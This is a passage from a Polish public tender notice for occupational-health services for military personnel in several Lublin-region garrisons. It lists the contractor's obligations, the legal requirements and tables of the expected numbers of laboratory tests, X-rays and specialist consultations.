2	KONSULTACJA LARYNGOLOGICZNA	szt.	338
3	AUDIOGRAM	szt.	370
4	EKG + OPIS 	szt.	780
5	KONSULTACJA PULMUNOLOGICZNA	szt.	10
6	SPIROMETRIA	szt.	32
7	KONSULTACJA ORTOPEDYCZNA	szt.	5
8	KONSULTACJA DERMATOLOGICZNA	szt.	32
9	KONSULTACJA PSYCHIATRYCZNA	szt.	10
10	KONSULTACJA NEUROLOGICZNA	szt.	196
11	BADANIE LEKARZA MEDYCYNY PRACY-BADANIE WSTĘPNE, OKRESOWE, KONTROLNE-ZAKOŃCZONE WYSTAWIENIEM ZAŚWIADCZENIA	szt.	446
12	BADANIE LEKARZA UPRAWNIONEGO DO PRZEPROWADZENIA BADAŃ W ZAKRESIE PRACY PRZY NARAŻENIU NA MIKROFALE + WYDANIE ZAŚWIADCZENIA	szt.	5
13	BADANIE LEKARSKIE DO CELÓW SANITARNO- EPIDEMIOLOGICZNYCH+ WYDANIE ZAŚWIADCZENIA	szt.	20
14	BADANIE KIEROWCÓW (konsultacje specjalistyczne) + WYDANIE ZAŚWIADCZENIA	pakiet	45.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część Nr 2 - Usługi medyczne dla żołnierzy i pracowników garnizonu Lublin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część Nr 2 - Usługi medyczne dla żołnierzy i pracowników garnizonu Lublin:     JW. 5371- Grupa Zabezpieczenia Lublin i Jawidz,  Dowództwo Wielonarodowej Brygady   ( część polska), Batalion Dowodzenia WB ( część polska), Orkiestra Wojskowa, Żandarmeria Wojskowa, Rejonowy Zarząd Infrastruktury, Delegatura Wojskowej Ochrony p/poż, WKU, Skład Materiałowy Jawidz, , 43 Przedstawicielstwo Wojskowe Świdnik, Wojskowy Sąd Garnizonowy, Prokuratura Garnizonowa, Węzeł Łączności Lublin, Wojskowa Komenda Transportu,, Ośrodek Aktywacji Zawodowej , Wojskowe Biuro Emerytalne, Wojewódzki Sztab Wojskowy, TWKL, Wojskowa Pracownia Psychologiczna, Warsztaty Techniczne, Skłd RBlog Bezwola.
Dla części Nr 2.
1.	Realizacja usług odbywać się będzie na podstawie imiennych skierowań.
2.	Skierowanie zawierać będzie w szczególności: określenie rodzaju badania profilaktycznego, jakie ma być wykonane, określenie stanowiska pracy, na którym pracownik jest zatrudniony, informacje o występowaniu na stanowisku pracy czynników szkodliwych dla zdrowia lub warunków uciążliwych.

3.	Do podstawowych obowiązków Wykonawcy należeć będzie świadczenie usług z najwyższą starannością, aktualną wiedzą medyczną, dostępnymi metodami i środkami zapobiegania, rozpoznawania i leczenia chorób oraz zasadami etyki zawodowej, respektując prawa pacjenta w szczególności zgodnie z przepisami ustawy z dnia 15.04.2011 r. o działalności leczniczej (Dz. U. Nr 112, poz. 654), przepisami Ustawy z dnia 05.12.1996 r. o zawodach lekarza i lekarza dentysty (Dz. U. z 2008 r. Nr 136 poz. 857 z późn. zm.), przepisami Ustawy z dnia 05.07.1996 r. o zawodach pielęgniarki i położnej (Dz. U. z 2009 r. Nr 151, poz. 1217 z późn. zm.). 

4.	Świadczenia zdrowotne muszą być wykonywane przez personel lekarski, pielęgniarki i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem ministra Zdrowia i Opieki społecznej z dnia 30 maja 1996 r. w sprawie prowadzenia badan lekarskich pracowników zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. 1996 r. Nr 69, poz. 332 z późn. zm.).

5.	Wykonawca winien spełniać wymogi zawarte w: ustawie z dnia 27.06.1997 r. o służbie medycyny pracy (Dz. U. z 2004 r., Nr 125, poz. 1317), rozporządzeniu Ministra Zdrowia i Opieki społecznej z dnia 30.05.1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 z późn. zm.), rozporządzeniu Ministra Zdrowia z dnia 07.01.2004 r. w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia kierowania pojazdami (Dz. U. Nr 2, poz. 15), rozporządzeniu Ministra Obrony Narodowej z dnia 09.08.2010r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. z 2010 r. Nr 187, poz. 1257), rozporządzeniu Ministra Obrony Narodowej z dnia 23.12.2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz.U.2011r, Nr 8, poz. 36). 

6.	Prowadzenie nadzoru dyspanseryzacyjnego oraz niezbędnej dokumentacji zgodnie z Rozporządzeniem Ministra Obrony Narodowej z dnia 23 grudnia 2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz. U. z 2011 r., Nr 8, poz. 36) ( zał. 15,16,17). 

7.	Gabinety gdzie będą przeprowadzane badania muszą spełniać standardowe wymagania określone w rozporządzeniu Ministra Zdrowia z 10 listopada 2006r w sprawie wymagań, jakie powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia( Dz. U. z 2006 r, Nr 213, poz.1568 z późn. zm.), a sprzęt medyczny posiadać atesty i dopuszczenia określone przez Ministra Zdrowia.

8.	Wykonawca będzie prowadził rejestr przyjmowanych pacjentów zawierający:
1)	Imię i nazwisko pacjenta,
2)	Nazwisko lekarza przyjmującego,
3)	Datę zgłoszenia się pacjenta i rodzaje udzielonej porady, 
4)	Wyznaczony termin przyjęcia do konsultacji i datę przyjęcia, 
5)	Datę wpisania i inne dane niezbędne dla identyfikacji świadczonych usług wg wymogów przedmiotowej umowy.

9.	Realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku, od godz.700 do godz. 1500.

10.	Termin rozpoczęcia i zakończenia badań zaproponowany przez Wykonawcę nie może przekraczać okresu 2 dni roboczych od dnia zgłoszenia się skierowanej osoby.

11.	Badania wstępne i okresowe wykonywane będą w dniu zgłoszenia się skierowanego pracownika Zamawiającego, a zakończone nie później niż następnego dnia roboczego po dniu rozpoczęciu badań.

12.	W przypadku stwierdzenia konieczności wykonania specjalistycznego badania konsultacyjnego lub badania dodatkowego, niezbędnego dla prawidłowej oceny stanu zdrowia osoby przyjmowanej do pracy lub pracownika, termin badanie nie przekroczy 7 dni roboczych.

13.	Wykonawca zapewnia bieżącą realizację usług medycznych, w szczególności dyżur od poniedziałku do piątku lekarza uprawnionego do wykonywania badań profilaktycznych, oraz zastępstwa w razie czasowej nieobecności lekarza i lekarzy specjalistów. 

14.	W sytuacjach wymagających dodatkowych specjalistycznych badań osób kierowanych Zamawiający uznaje za konieczne przeprowadzenie dodatkowych badań zgodnie z obowiązującymi przepisami.

15.	Badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie
zaświadczenia stwierdzającego:
a)	Brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy;
b)	Przeciwwskazania zdrowotne do pracy na określonym stanowisku pracy.

16.	Orzeczenie lekarskie otrzymuje bezpośrednio żołnierz lub pracownik wojska, który był badany.

17.	Badanie lekarza orzecznika i wystawienie zaświadczenia do celów sanitarno-epidemiologicznych (w 2 egz. - oryginał i kopia) 

18.	Wykonawca do każdej wystawionej faktury będzie załączał zestawienie zawierające następujące dane:
a)	Nazwiska i Imiona osób przebadanych;
b)	Numery PESEL osób przebadanych;
c)	Nazwę jednostki wojskowej, bądź instytucji;
d)	Datę i rodzaj udzielonych świadczeń;
e)	Podział na pracowników wojska i żołnierzy zawodowych (PW; ŻZ).
f)	Zestawienie musi byś uprzednio potwierdzone pieczątką i podpisem
          jednostki wojskowej, instytucji   wystawiającej skierowanie na badanie.
19.	Wskazane jest, aby konsultacje i badania dodatkowe odbywały się w tej samej lokalizacji, co gabinet medycyny pracy, bez potrzeby przemieszczania się do innych placówek.

20.	Wykonawca zobowiązany jest do udziału w przeglądzie stanowisk pracy kadry i pracowników wojska, którzy wykonują pracę w warunkach szczególnie szkodliwych dla zdrowia, szczególnie uciążliwych i niebezpiecznych.

21.	Wykonawca po przeprowadzeniu przez specjalistę badań okulistycznych i po stwierdzeniu konieczności stosowania przez pracownika okularów korygujących wzrok przy obsłudze monitora ekranowego musi udokumentować konieczność korekcji wady wzroku, stosownym zaświadczeniem.


22.	TERMIN WYKONANIA ZAMÓWIENIA Okres obowiązywania umowy: od daty podpisania do 31.12.2013r.

	ZAKRES BADAŃ: 

DO CZĘŚCI 2.

BADANIA LABORATORYJNE
			



				
Lp	Rodzaj Badania	JM		Przewidywana Ilość badań
1	MORFOLOGIA 	szt.		760
2	OB.	szt.		760
3	GLUKOZA	szt.		760
4	CHOLESTEROL	szt.		760
5	LDL	szt.		760
6	HDL	szt.		760
7	TG	szt.		760
8	ASPAT	szt.		530
9	ALAT	szt.		530
10	BILIRUBINA CAŁKOWITA	szt.		150
11	KREATYNINA	szt.		100
12	MOCZNIK	szt.	     100
13	CRP	szt.		30
14	GGTP	szt.	31
15	VDRL	szt.	10
16	HBsAG	szt.		10
17	JONOGRAM	szt.	   10
18	HCV	szt.	   5
19	KAŁ NA NOSICIELSTWO X 3 PRÓBY	szt.		10
20	KOPROPORFIRYNA W MOCZU	szt.		20
21	MOCZ BADANIE OGÓLNE	szt.		760
	


BADANIA DODATKOWE	
		
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
1	RTG KRĘGOSŁUPA SZYJNEGO	szt 	10
2	RTG KRĘGOSŁUPA PIERSIOWEGO (DWIE PROJEKCJE)	szt 	8
3	RTG KRĘGOSŁUPA LĘDŹWIOWO KRZYŻOWEGO (DWIE PROJEKCJE)	 szt	10
4	RTG KLATKI PIERSIOWEJ +OPIS	szt.	355
	


		
			
	KONSULTACJE SPECJALISTYCZNE		
			
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
			
1	KONSULTACJA OKULISTYCZNA	szt.	445
2	KONSULTACJA LARYNGOLOGICZNA	szt.	225
3	AUDIOGRAM	szt.	60
4	EKG + OPIS 	szt.	445
5	KONSULTACJA PULMUNOLOGICZNA	szt.	10
6	SPIROMETRIA	szt.	10
7	KONSULTACJA ORTOPEDYCZNA	szt.	5
8	KONSULTACJA DERMATOLOGICZNA	szt.	15
9	KONSULTACJA PSYCHIATRYCZNA	szt.	10
10	KONSULTACJA NEUROLOGICZNA	szt.	140
11	BADANIE LEKARZA MEDYCYNY PRACY-BADANIE WSTĘPNE, OKRESOWE, KONTROLNE-ZAKOŃCZONE WYSTAWIENIEM ZAŚWIADCZENIA	szt.	445
			
12	BADANIE LEKARZA UPRAWNIONEGO DO PRZEPROWADZENIA BADAŃ W ZAKRESIE PRACY PRZY NARAŻENIU NA MIKROFALE + WYDANIE ZAŚWIADCZENIA	szt.	10
13	BADANIE LEKARSKIE DO CELÓW SANITARNO- EPIDEMIOLOGICZNYCH+ WYDANIE ZAŚWIADCZENIA	szt.	10
14	BADANIE KIEROWCÓW (konsultacje specjalistyczne) + WYDANIE ZAŚWIADCZENIA	pakiet	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część Nr 3 - Usługi medyczne dla żołnierzy i pracowników garnizonu Chełm..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część Nr 3 - Usługi medyczne dla żołnierzy i pracowników garnizonu Chełm: Grupa Zabezpieczenia Chełm - JW. 5371, WKU, Węzeł Łączności, 1 batalion zmechanizowany, dywizjon artylerii samobieżnej, 35 patrol rozminowania , WKU,
Dla części Nr 3.
1.	Realizacja usług odbywać się będzie na podstawie imiennych skierowań.
2.	Skierowanie zawierać będzie w szczególności: określenie rodzaju badania profilaktycznego, jakie ma być wykonane, określenie stanowiska pracy, na którym pracownik jest zatrudniony, informacje o występowaniu na stanowisku pracy czynników szkodliwych dla zdrowia lub warunków uciążliwych.

3.	Do podstawowych obowiązków Wykonawcy należeć będzie świadczenie usług z najwyższą starannością, aktualną wiedzą medyczną, dostępnymi metodami i środkami zapobiegania, rozpoznawania i leczenia chorób oraz zasadami etyki zawodowej, respektując prawa pacjenta w szczególności zgodnie z przepisami ustawy z dnia 15.04.2011 r. o działalności leczniczej (Dz. U. Nr 112, poz. 654), przepisami Ustawy z dnia 05.12.1996 r. o zawodach lekarza i lekarza dentysty (Dz. U. z 2008 r. Nr 136 poz. 857 z późn. zm.), przepisami Ustawy z dnia 05.07.1996 r. o zawodach pielęgniarki i położnej (Dz. U. z 2009 r. Nr 151, poz. 1217 z późn. zm.). 

4.	Świadczenia zdrowotne muszą być wykonywane przez personel lekarski, pielęgniarki i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem ministra Zdrowia i Opieki społecznej z dnia 30 maja 1996 r. w sprawie prowadzenia badan lekarskich pracowników zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. 1996 r. Nr 69, poz. 332 z późn. zm.).

5.	Wykonawca winien spełniać wymogi zawarte w: ustawie z dnia 27.06.1997 r. o służbie medycyny pracy (Dz. U. z 2004 r., Nr 125, poz. 1317), rozporządzeniu Ministra Zdrowia i Opieki społecznej z dnia 30.05.1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 z późn. zm.), rozporządzeniu Ministra Zdrowia z dnia 07.01.2004 r. w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia kierowania pojazdami (Dz. U. Nr 2, poz. 15), rozporządzeniu Ministra Obrony Narodowej z dnia 09.08.2010r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. z 2010 r. Nr 187, poz. 1257), rozporządzeniu Ministra Obrony Narodowej z dnia 23.12.2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz.U.2011r, Nr 8, poz. 36). 

6.	Prowadzenie nadzoru dyspanseryzacyjnego oraz niezbędnej dokumentacji zgodnie z Rozporządzeniem Ministra Obrony Narodowej z dnia 23 grudnia 2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz. U. z 2011 r., Nr 8, poz. 36) ( zał. 15,16,17). 


7.	Gabinety gdzie będą przeprowadzane badania muszą spełniać standardowe wymagania określone w rozporządzeniu Ministra Zdrowia z 10 listopada 2006r w sprawie wymagań, jakie powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia( Dz. U. z 2006 r, Nr 213, poz.1568 z późn. zm.), a sprzęt medyczny posiadać atesty i dopuszczenia określone przez Ministra Zdrowia.

8.	Wykonawca będzie prowadził rejestr przyjmowanych pacjentów zawierający:
1)	Imię i nazwisko pacjenta,
2)	Nazwisko lekarza przyjmującego,
3)	Datę zgłoszenia się pacjenta i rodzaje udzielonej porady, 
4)	Wyznaczony termin przyjęcia do konsultacji i datę przyjęcia, 
5)	Datę wpisania i inne dane niezbędne dla identyfikacji świadczonych usług wg wymogów przedmiotowej umowy.

9.	Realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku, od godz.700 do godz. 1500.

10.	Termin rozpoczęcia i zakończenia badań zaproponowany przez Wykonawcę nie może przekraczać okresu 2 dni roboczych od dnia zgłoszenia się skierowanej osoby.

11.	Badania wstępne i okresowe wykonywane będą w dniu zgłoszenia się skierowanego pracownika Zamawiającego, a zakończone nie później niż następnego dnia roboczego po dniu rozpoczęciu badań.

12.	W przypadku stwierdzenia konieczności wykonania specjalistycznego badania konsultacyjnego lub badania dodatkowego, niezbędnego dla prawidłowej oceny stanu zdrowia osoby przyjmowanej do pracy lub pracownika, termin badanie nie przekroczy 7 dni roboczych.

13.	Wykonawca zapewnia bieżącą realizację usług medycznych, w szczególności dyżur od poniedziałku do piątku lekarza uprawnionego do wykonywania badań profilaktycznych, oraz zastępstwa w razie czasowej nieobecności lekarza i lekarzy specjalistów. 

14.	W sytuacjach wymagających dodatkowych specjalistycznych badań osób kierowanych Zamawiający uznaje za konieczne przeprowadzenie dodatkowych badań zgodnie z obowiązującymi przepisami.

15.	Badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie zaświadczenia stwierdzającego:
a)	Brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy;
b)	Przeciwwskazania zdrowotne do pracy na określonym stanowisku pracy.

16.	Orzeczenie lekarskie otrzymuje bezpośrednio żołnierz lub pracownik wojska, który był badany.

17.	Badanie lekarza orzecznika i wystawienie zaświadczenia do celów sanitarno-epidemiologicznych (w 2 egz. - oryginał i kopia) 

18.	Wykonawca do każdej wystawionej faktury będzie załączał zestawienie zawierające następujące dane:
a)	Nazwiska i Imiona osób przebadanych;
b)	Numery PESEL osób przebadanych;
c)	Nazwę jednostki wojskowej, bądź instytucji;
d)	Datę i rodzaj udzielonych świadczeń;
e)	Podział na pracowników wojska i żołnierzy zawodowych 
         (PW; ŻZ).
f)	 Zestawienie musi byś uprzednio potwierdzone pieczątką i podpisem    jednostki wojskowej, instytucji   wystawiającej skierowanie na badanie.

19.	Wskazane jest, aby konsultacje i badania dodatkowe odbywały się w tej samej lokalizacji, co gabinet medycyny pracy, bez potrzeby przemieszczania się do innych placówek.

20.	Wykonawca zobowiązany jest do udziału w przeglądzie stanowisk pracy kadry i pracowników wojska, którzy wykonują pracę w warunkach szczególnie szkodliwych dla zdrowia, szczególnie uciążliwych i niebezpiecznych.

21.	Wykonawca po przeprowadzeniu przez specjalistę badań okulistycznych i po stwierdzeniu konieczności stosowania przez pracownika okularów korygujących wzrok przy obsłudze monitora ekranowego musi udokumentować konieczność korekcji wady wzroku, stosownym zaświadczeniem.
22.	TERMIN WYKONANIA ZAMÓWIENIA
Okres obowiązywania umowy: od daty podpisania do 31.12.2013r

	ZAKRES BADAŃ: 


DO CZĘŚCI 3.

BADANIA LABORATORYJNE
		



			
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
1	MORFOLOGIA 	szt.	420
2	OB.	szt.	420
3	GLUKOZA	szt.	420
4	CHOLESTEROL	szt.	420
5	LDL	szt.	420
6	HDL	szt.	420
7	TG	szt.	335
8	ASPAT	szt.	335
9	ALAT	szt.	335
10	BILIRUBINA CAŁKOWITA	szt.	50
11	KREATYNINA	szt.	335
12	MOCZNIK	szt.	335
13	CRP	szt.	30
14	GGTP	szt.	30
15	VDRL	szt.	10
16	HBsAG	szt.	10
17	JONOGRAM	szt.	10
18	HCV	szt.	5
19	KAŁ NA NOSICIELSTWO X 3 PRÓBY	szt.	10
20	KOPROPORFIRYNA W MOCZU	szt.	20
21	MOCZ BADANIE OGÓLNE	szt.	420
	
	
BADANIA DODATKOWE	
		
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
1	RTG KRĘGOSŁUPA SZYJNEGO	szt 	10
2	RTG KRĘGOSŁUPA PIERSIOWEGO (DWIE PROJEKCJE)	szt 	8
3	RTG KRĘGOSŁUPA LĘDŹWIOWO KRZYŻOWEGO (DWIE PROJEKCJE)	 szt	10
4	RTG KLATKI PIERSIOWEJ +OPIS	szt.	150
	
			
	KONSULTACJE SPECJALISTYCZNE		
			
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
			
1	KONSULTACJA OKULISTYCZNA	szt.	75
2	KONSULTACJA LARYNGOLOGICZNA	szt.	25
3	AUDIOGRAM	szt.	250
4	EKG + OPIS 	szt.	420
5	KONSULTACJA PULMUNOLOGICZNA	szt.	10
6	SPIROMETRIA	szt.	32
7	KONSULTACJA ORTOPEDYCZNA	szt.	5
			
8	KONSULTACJA DERMATOLOGICZNA	szt.	30
9	KONSULTACJA PSYCHIATRYCZNA	szt.	10
10	KONSULTACJA NEUROLOGICZNA	szt.	200
11	BADANIE LEKARZA MEDYCYNY PRACY-BADANIE WSTĘPNE, OKRESOWE, KONTROLNE-ZAKOŃCZONE WYSTAWIENIEM ZAŚWIADCZENIA	szt.	420
12	BADANIE LEKARZA UPRAWNIONEGO DO PRZEPROWADZENIA BADAŃ W ZAKRESIE PRACY PRZY NARAŻENIU NA MIKROFALE + WYDANIE ZAŚWIADCZENIA	szt.	5
13	BADANIE LEKARSKIE DO CELÓW SANITARNO- EPIDEMIOLOGICZNYCH+ WYDANIE ZAŚWIADCZENIA	szt.	15
14	BADANIE KIEROWCÓW (konsultacje specjalistyczne) + WYDANIE ZAŚWIADCZENIA	pakiet	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Części Nr 4 - Usługi medyczne dla żołnierzy i pracowników garnizonu Hrubieszów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Części Nr 4 - Usługi medyczne dla żołnierzy i pracowników garnizonu Hrubieszów:  JW 5371 Grupa zabezpieczenia - Hrubieszów, 2 Pułk Rozpoznawczy , Węzeł Łączności, 

Część Nr 4 - Usługi medyczne dla żołnierzy i pracowników garnizonu Hrubieszów:  JW 5371 Grupa zabezpieczenia - Hrubieszów, 2 Pułk Rozpoznawczy , Węzeł Łączności. 
Wykonawca realizujący przedmiot zamówienia musi dysponować gabinetem lekarskim  oraz bazą do wykonywania badań laboratoryjnych i innych określonych      w załącznikach.
  Wykonawca zobowiązuje się do wykonywania badań przez wykwalifikowany 
personel posiadający wszelkie niezbędne uprawnienia i dysponujący wysokiej, jakości sprzętem medycznym. 

 Dla zadania Nr 4
1.	Realizacja usług odbywać się będzie na podstawie imiennych skierowań.
2.	Skierowanie zawierać będzie w szczególności: określenie rodzaju badania profilaktycznego, jakie ma być wykonane, określenie stanowiska pracy, na którym pracownik jest zatrudniony, informacje o występowaniu na stanowisku pracy czynników szkodliwych dla zdrowia lub warunków uciążliwych.

3.	Do podstawowych obowiązków Wykonawcy należeć będzie świadczenie usług z najwyższą starannością, aktualną wiedzą medyczną, dostępnymi metodami i środkami zapobiegania, rozpoznawania i leczenia chorób oraz zasadami etyki zawodowej, respektując prawa pacjenta w szczególności zgodnie z przepisami ustawy z dnia 15.04.2011 r. o działalności leczniczej (Dz. U. Nr 112, poz. 654), przepisami Ustawy z dnia 05.12.1996 r. o zawodach lekarza i lekarza dentysty (Dz. U. z 2008 r. Nr 136 poz. 857 z późn. zm.), przepisami Ustawy z dnia 05.07.1996 r. o zawodach pielęgniarki i położnej (Dz. U. z 2009 r. Nr 151, poz. 1217 z późn. zm.). 

4.	Świadczenia zdrowotne muszą być wykonywane przez personel lekarski, pielęgniarki i inny posiadający odpowiednie kwalifikacje i uprawnienia określone rozporządzeniem ministra Zdrowia i Opieki społecznej z dnia 30 maja 1996 r. w sprawie prowadzenia badan lekarskich pracowników zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. 1996 r. Nr 69, poz. 332 z późn. zm.).

5.	Wykonawca winien spełniać wymogi zawarte w: ustawie z dnia 27.06.1997 r. o służbie medycyny pracy (Dz. U. z 2004 r., Nr 125, poz. 1317), rozporządzeniu Ministra Zdrowia i Opieki społecznej z dnia 30.05.1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996 r. Nr 69, poz. 332 z późn. zm.), rozporządzeniu Ministra Zdrowia z dnia 07.01.2004 r. w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia kierowania pojazdami (Dz. U. Nr 2, poz. 15), rozporządzeniu Ministra Obrony Narodowej z dnia 09.08.2010r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. z 2010 r. Nr 187, poz. 1257), rozporządzeniu Ministra Obrony Narodowej z dnia 23.12.2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz.U.2011r, Nr 8, poz. 36). 

6.	Prowadzenie nadzoru dyspanseryzacyjnego oraz niezbędnej dokumentacji zgodnie z Rozporządzeniem Ministra Obrony Narodowej z dnia 23 grudnia 2010 r. w sprawie niektórych świadczeń zdrowotnych przysługujących żołnierzom zawodowym (Dz. U. z 2011 r., Nr 8, poz. 36) ( zał. 15,16,17). 


7.	Gabinety gdzie będą przeprowadzane badania muszą spełniać standardowe wymagania określone w rozporządzeniu Ministra Zdrowia z 10 listopada 2006r w sprawie wymagań, jakie powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia( Dz. U. z 2006 r, Nr 213, poz.1568 z późn. zm.), a sprzęt medyczny posiadać atesty i dopuszczenia określone przez Ministra Zdrowia.

8.	Wykonawca będzie prowadził rejestr przyjmowanych pacjentów zawierający:
a)	Imię i nazwisko pacjenta,
b)	Nazwisko lekarza przyjmującego,
c)	Datę zgłoszenia się pacjenta i rodzaje udzielonej porady, 
d)	Wyznaczony termin przyjęcia do konsultacji i datę przyjęcia, 
e)	Datę wpisania i inne dane niezbędne dla identyfikacji świadczonych usług wg wymogów przedmiotowej umowy.

9.	Realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku, od godz.700 do godz. 1500.

10.	Termin rozpoczęcia i zakończenia badań zaproponowany przez Wykonawcę nie może przekraczać okresu 2 dni roboczych od dnia zgłoszenia się skierowanej osoby.

11.	Badania wstępne i okresowe wykonywane będą w dniu zgłoszenia się skierowanego pracownika Zamawiającego, a zakończone nie później niż następnego dnia roboczego po dniu rozpoczęciu badań.

12.	W przypadku stwierdzenia konieczności wykonania specjalistycznego badania konsultacyjnego lub badania dodatkowego, niezbędnego dla prawidłowej oceny stanu zdrowia osoby przyjmowanej do pracy lub pracownika, termin badanie nie przekroczy 7 dni roboczych.

13.	Wykonawca zapewnia bieżącą realizację usług medycznych, w szczególności dyżur od poniedziałku do piątku lekarza uprawnionego do wykonywania badań profilaktycznych, oraz zastępstwa w razie czasowej nieobecności lekarza i lekarzy specjalistów. 

14.	W sytuacjach wymagających dodatkowych specjalistycznych badań osób kierowanych Zamawiający uznaje za konieczne przeprowadzenie dodatkowych badań zgodnie z obowiązującymi przepisami.

15.	Badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie
zaświadczenia stwierdzającego:
a)	Brak przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy;
b)	Przeciwwskazania zdrowotne do pracy na określonym stanowisku pracy.

16.	Orzeczenie lekarskie otrzymuje bezpośrednio żołnierz lub pracownik wojska, który był badany.

17.	Badanie lekarza orzecznika i wystawienie zaświadczenia do celów sanitarno-epidemiologicznych (w 2 egz. - oryginał i kopia) 

18.	Wykonawca do każdej wystawionej faktury będzie załączał zestawienie zawierające następujące dane:
a)	Nazwiska i Imiona osób przebadanych;
b)	Numery PESEL osób przebadanych;
g)	Nazwę jednostki wojskowej, bądź instytucji;
c)	Datę i rodzaj udzielonych świadczeń;
d)	Podział na pracowników wojska i żołnierzy zawodowych 
                     (PW;  ŻZ).
e)	Zestawienie musi byś uprzednio potwierdzone pieczątką 
                   i  podpisem jednostki wojskowej, instytucji   wystawiającej
                  skierowanie na badanie.

19.	Wskazane jest, aby konsultacje i badania dodatkowe odbywały się w tej samej lokalizacji, co gabinet medycyny pracy, bez potrzeby przemieszczania się do innych placówek.

20.	Wykonawca zobowiązany jest do udziału w przeglądzie stanowisk pracy kadry i pracowników wojska, którzy wykonują pracę w warunkach szczególnie szkodliwych dla zdrowia, szczególnie uciążliwych i niebezpiecznych.


21.	Wykonawca po przeprowadzeniu przez specjalistę badań okulistycznych i po stwierdzeniu konieczności stosowania przez pracownika okularów korygujących wzrok przy obsłudze monitora ekranowego musi udokumentować konieczność korekcji wady wzroku, stosownym zaświadczeniem.
22.	TERMIN WYKONANIA ZAMÓWIENIA
Okres obowiązywania umowy: od daty podpisania do 31.12.2013 r.

	ZAKRES BADAŃ: 

DO ZADANIA 4.

BADANIA LABORATORYJNE
		



			
Lp	Rodzaj Badania	JM	Przewidywana Ilość badań
1	MORFOLOGIA 	szt.	375
2	OB.	szt.	375
3	GLUKOZA	szt.	375
4	CHOLESTEROL	szt.	375
5	LDL	szt.	375
6	HDL	szt.	375
7	TG	szt.	336
8	ASPAT	szt.	336
9	ALAT	szt.	336
10	BILIRUBINA CAŁKOWITA	szt.	336
11	KREATYNINA	szt.	336
12	MOCZNIK	szt.	336
13	CRP	szt.	30
14	GGTP	szt.	30
15	VDRL	szt.	            10
16	HBsAG	szt.	10
17	JONOGRAM	szt.	10
18	HCV	szt.	5
19	KAŁ NA NOSICIELSTWO X 3 PRÓBY	szt.	20
20	KOPROPORFIRYNA W MOCZU	szt.	20
